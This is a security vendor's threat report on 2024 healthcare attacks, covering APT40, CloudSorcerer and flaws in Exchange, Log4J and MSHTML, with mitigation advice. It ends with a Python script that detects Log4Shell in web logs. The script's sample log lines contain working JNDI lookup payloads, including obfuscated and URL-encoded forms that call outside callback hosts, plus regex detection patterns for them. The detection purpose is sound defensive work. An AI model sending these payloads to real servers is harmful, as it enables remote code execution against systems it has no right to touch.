
2024 Healthcare Cybersecurity Threats: Critical Vulnerabilities in Microsoft Exchange, Log4J, and Windows MSHTML

  • Rescana
  • Oct 10, 2024
  • 3 min read

Executive Summary

In 2024, 78% of surveyed healthcare organizations worldwide reported at least one cybersecurity incident. These incidents have disrupted care delivery and, in a meaningful share of cases, endangered patient safety and the integrity of connected medical devices. This report analyzes the vulnerabilities, exploitation activity, and threat actors involved and offers actionable guidance for Rescana's clients to strengthen their security posture.

Technical Information

The healthcare industry is a prime target because of the critical services it delivers and the sensitive data it holds. The weaknesses most commonly exploited are weak or reused credentials, outdated or unpatched software, and missing or inadequate encryption of data in transit and at rest. Notably, APT40, a China-based cyber espionage group, has been actively exploiting vulnerabilities in Microsoft Exchange, Log4J, and Atlassian Confluence; the group is known for weaponizing newly disclosed vulnerabilities in widely deployed software within days of publication. These vulnerabilities have been leveraged to gain unauthorized access to healthcare networks, leading to data breaches and potential disruption of medical services. A zero-day vulnerability in the Windows MSHTML platform has also been a focal point for attackers, who use it to deliver information-stealing malware. The vulnerability allows attackers to execute arbitrary code on a targeted endpoint, compromising the confidentiality and integrity of sensitive healthcare data.

Healthcare organizations have reported significant impacts on care delivery: 61% of surveyed organizations experienced notable disruption, and in 15% of cases the incident had severe consequences for patient health and safety. Critical medical devices, such as MRI scanners and infusion pumps, were compromised in 30% of incidents, which underlines the urgent need for robust controls around clinical equipment. Infrastructure is also at risk: 27% of incidents targeted Building Management System (BMS) devices. Furthermore, 38% of organizations have only basic or no network segmentation, so a single compromised workstation or device can often reach clinical systems directly.

The newly identified APT group CloudSorcerer abuses legitimate public cloud services for command and control and data exfiltration, so its traffic blends into normal cloud usage and is hard to distinguish from legitimate activity. The group has been particularly effective where cloud-bound traffic is not monitored and cloud-service access is not tightly controlled, leading to significant data breaches. The healthcare sector's growing reliance on cloud services makes it necessary to reevaluate security strategies, including logging and egress control for cloud service access, to mitigate these emerging threats.

Exploitation in the Wild

Exploitation of the Windows MSHTML platform zero-day vulnerability has been observed in the wild, with attackers using it to deploy information-stealing malware. The indicators of compromise available are behavioral rather than specific artifacts: unusual outbound network traffic, unauthorized access attempts, and unexpected executables or scripts on affected systems. Defenders should correlate these signals with endpoint and network telemetry rather than rely on static signatures alone. Exploitation of Microsoft Exchange and Log4J vulnerabilities has also been prevalent, with attackers using these weaknesses to establish persistent access to healthcare networks.

APT Groups using these vulnerabilities

APT40 and CloudSorcerer have been identified as the key actors. APT40, known for sophisticated cyber espionage, targets healthcare infrastructure to exfiltrate sensitive data. CloudSorcerer, by contrast, relies on public cloud services as its operating infrastructure, conducting data theft where cloud access is poorly controlled and monitored.

Affected Product Versions

The vulnerabilities in Microsoft Exchange, Log4J, and Atlassian Confluence affect multiple versions of these products. Organizations running outdated or unpatched versions are particularly at risk, and Log4J exposure is easy to underestimate because the library is frequently bundled inside other applications rather than installed on its own. The Windows MSHTML platform zero-day vulnerability affects systems running older versions of Windows, so immediate patching and retirement of unsupported builds are required. Consult the vendor advisories for the exact affected version ranges.

Workaround and Mitigation

To mitigate these threats, healthcare organizations should prioritize proactive vulnerability management: maintain an inventory of internet-facing and Log4J-dependent systems, patch Exchange, Confluence, and Windows promptly, and retire end-of-life software. Enforce strong authentication, including unique credentials and multi-factor authentication for remote and administrative access, and encrypt sensitive data in transit and at rest. Improve network segmentation so that medical devices, BMS devices, and user workstations sit in separate zones and lateral movement is limited. Enhance employee training on phishing and credential hygiene. Finally, monitor network traffic and device behavior for early detection, including outbound connections from servers to unfamiliar hosts and exploitation attempts recorded in web server logs.
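The monitoring recommendation above and the behavioral indicators listed under Exploitation in the Wild are easier to act on with a concrete detection. The following script is an added example written for this page, not Rescana's code or part of its CTEM platform. It assumes the Log4J exploitation described here is the JNDI lookup injection widely known as Log4Shell, and scans web server access log lines for lookup strings, including the URL-encoded and nested (${lower:...}, ${::-x}) forms attackers use to evade naive string matching. The log lines, IP addresses, and hostnames are constructed for the example and use documentation address ranges.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic). The first three carry
# Log4Shell-style JNDI lookups in different disguises; the last two are benign.
SAMPLE_LOG = r"""
203.0.113.10 - - [10/Oct/2024:12:01:02 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.5:1389/a}"
203.0.113.11 - - [10/Oct/2024:12:01:05 +0000] "GET /api/patient?id=${${lower:j}ndi:${lower:l}dap://198.51.100.5/x} HTTP/1.1" 400 0 "-" "curl/8.0"
203.0.113.12 - - [10/Oct/2024:12:01:09 +0000] "POST /upload HTTP/1.1" 200 77 "-" "%24%7Bjndi%3Armi%3A%2F%2F198.51.100.7%3A1099%2Fobj%7D"
198.51.100.20 - - [10/Oct/2024:12:02:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
198.51.100.21 - - [10/Oct/2024:12:02:30 +0000] "GET /static/app.js HTTP/1.1" 304 0 "-" "Mozilla/5.0"
"""

# Nested lookups that attackers use to break up the literal "jndi" token.
LOOKUP_CASE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.I)   # ${lower:j} -> j
LOOKUP_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")          # ${::-j} -> j
# Final pattern: ${jndi:<scheme>:[//]<host[:port]>
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*/*([^/}\s]+)", re.I)
SRC_IP = re.compile(r"^(\S+)")


def normalize(raw):
    """Undo bounded URL-encoding layers, then collapse nested lookups inside out."""
    s = raw
    for _ in range(3):                       # attackers sometimes double-encode
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    while True:                              # repeat until no lookup rewrites remain
        new = LOOKUP_CASE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(), s)
        new = LOOKUP_DEFAULT.sub(lambda m: m.group(1), new)
        if new == s:
            return s
        s = new


def find_jndi(line):
    """Return {src, scheme, host, normalized} for a line carrying a JNDI lookup, else None."""
    norm = normalize(line)
    m = JNDI.search(norm)
    if not m:
        return None
    src = SRC_IP.match(line)
    return {
        "src": src.group(1) if src else "?",
        "scheme": m.group(1).lower(),     # ldap, ldaps, rmi, dns, iiop, ...
        "host": m.group(2),               # attacker-controlled callback host
        "normalized": norm,
    }


def scan_log(text):
    """Scan a whole log blob; returns one hit dict per line that contains a lookup."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        hit = find_jndi(line)
        if hit:
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f"JNDI lookup from {h['src']}: scheme={h['scheme']} callback={h['host']}")
```

A hit does not prove the target was vulnerable; it proves someone tried, and the callback host is the next pivot: block it at the egress firewall and search DNS and NetFlow for any internal host that actually resolved or connected to it. Extend the normalization step for whichever obfuscations you see in your own logs rather than trying to anticipate all of them.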

Rescana is here for you

At Rescana, we are committed to helping our clients navigate the complex cybersecurity landscape. Our Continuous Threat and Exposure Management (CTEM) platform provides comprehensive solutions to identify and mitigate vulnerabilities, ensuring the security and integrity of your healthcare infrastructure. We are here to support you in safeguarding your organization against emerging threats. For any questions or further information, please contact us at ops@rescana.com.
